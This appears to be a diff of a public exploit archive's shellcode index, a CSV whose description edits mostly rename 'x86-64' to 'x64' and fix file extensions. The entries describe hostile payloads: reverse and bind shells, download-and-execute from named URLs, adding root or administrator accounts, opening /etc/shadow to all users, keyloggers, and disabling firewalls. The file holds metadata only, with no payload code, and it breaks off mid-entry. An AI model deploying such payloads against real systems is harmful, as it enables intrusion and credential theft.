+24318,shellcodes/windows/24318.c,"Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows 25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86 40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware 27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips @@ -461,23 +461,23 @@ id,file,description,date,author,type,platform 28996,shellcodes/windows/28996.c,"Windows - MessageBox + Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows 29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips 40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86 -33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows +33836,shellcodes/windows/33836.c,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows 34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86 34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86 34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86 -34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64 +34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64 34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86 -35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64 -35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86 -35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 -35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 +35205,shellcodes/linux_x86-64/35205.asm,"Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64 +35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86 +35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 +35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86 -35794,shellcodes/windows_x86-64/35794.txt,"Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64 +35794,shellcodes/windows_x86-64/35794.txt,"Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips -36411,shellcodes/generator/36411.txt,"Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator +36411,shellcodes/generator/36411.py,"Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips 36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips -36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64 +36359,shellcodes/linux_x86-64/36359.c,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64 36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 @@ -494,7 +494,7 @@ id,file,description,date,author,type,platform 36780,shellcodes/windows_x86/36780.c,"Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86 36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator 36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86 -36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64 +36858,shellcodes/linux_x86-64/36858.c,"Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64 36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86 36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86 37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86 @@ -504,7 +504,7 @@ id,file,description,date,author,type,platform 37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86 37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 -37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64 +37362,shellcodes/linux_x86-64/37362.c,"Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86 37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86 @@ -512,104 +512,104 @@ id,file,description,date,author,type,platform 37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 -37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64 -37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86 +37401,shellcodes/linux_x86-64/37401.asm,"Linux/x64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64 +37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator)",2015-07-05,"Artem T",shellcode,linux_x86 37664,shellcodes/windows_x86/37664.c,"Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86 37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86 -37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86 -37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86 -37895,shellcodes/windows_x86-64/37895.asm,"Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64 -38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx +37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86 +37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator)",2015-08-12,"Anastasios Monachos",shellcode,linux_x86 +37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64 +38065,shellcodes/osx/38065.txt,"OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx 38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z 38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86 38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator 38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86 -38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx -38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64 +38126,shellcodes/osx/38126.c,"OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx +38150,shellcodes/linux_x86-64/38150.txt,"Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64 38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android -38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64 -38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64 -38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64 -38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64 -38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator -39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64 -39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64 +38239,shellcodes/linux_x86-64/38239.asm,"Linux/x64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64 +38469,shellcodes/linux_x86-64/38469.c,"Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64 +38708,shellcodes/linux_x86-64/38708.asm,"Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64 +38815,shellcodes/linux_x86-64/38815.c,"Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64 +38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator +39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64 +39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64 39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86 -39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64 -39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64 +39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64 +39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64 39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86 -39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64 -39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux -39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux -39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux -39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64 -39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 +39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64 +39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux +39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux +39338,shellcodes/linux/39338.c,"Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux +39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64 +39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86 -39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 +39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm 39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86 -39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64 -39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64 -39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 -39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 -39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64 -39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64 -39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64 -40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64 +39617,shellcodes/linux_x86-64/39617.c,"Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64 +39624,shellcodes/linux_x86-64/39624.c,"Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 +39625,shellcodes/linux_x86-64/39625.c,"Linux/x64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 +39684,shellcodes/linux_x86-64/39684.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64 +39700,shellcodes/linux_x86-64/39700.c,"Linux/x64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64 +39718,shellcodes/linux_x86-64/39718.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64 +40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 -39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator +39728,shellcodes/generator/39728.py,"Linux/x64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator 39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows 39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86 -39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows 39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator -39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39847,shellcodes/linux_x86-64/39847.c,"Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86 -39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple +39869,shellcodes/linux_x86-64/39869.c,"Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86 39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39979,shellcodes/windows/39979.c,"Windows (XP < 10) - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows 40005,shellcodes/windows_x86/40005.c,"Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86 -40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd 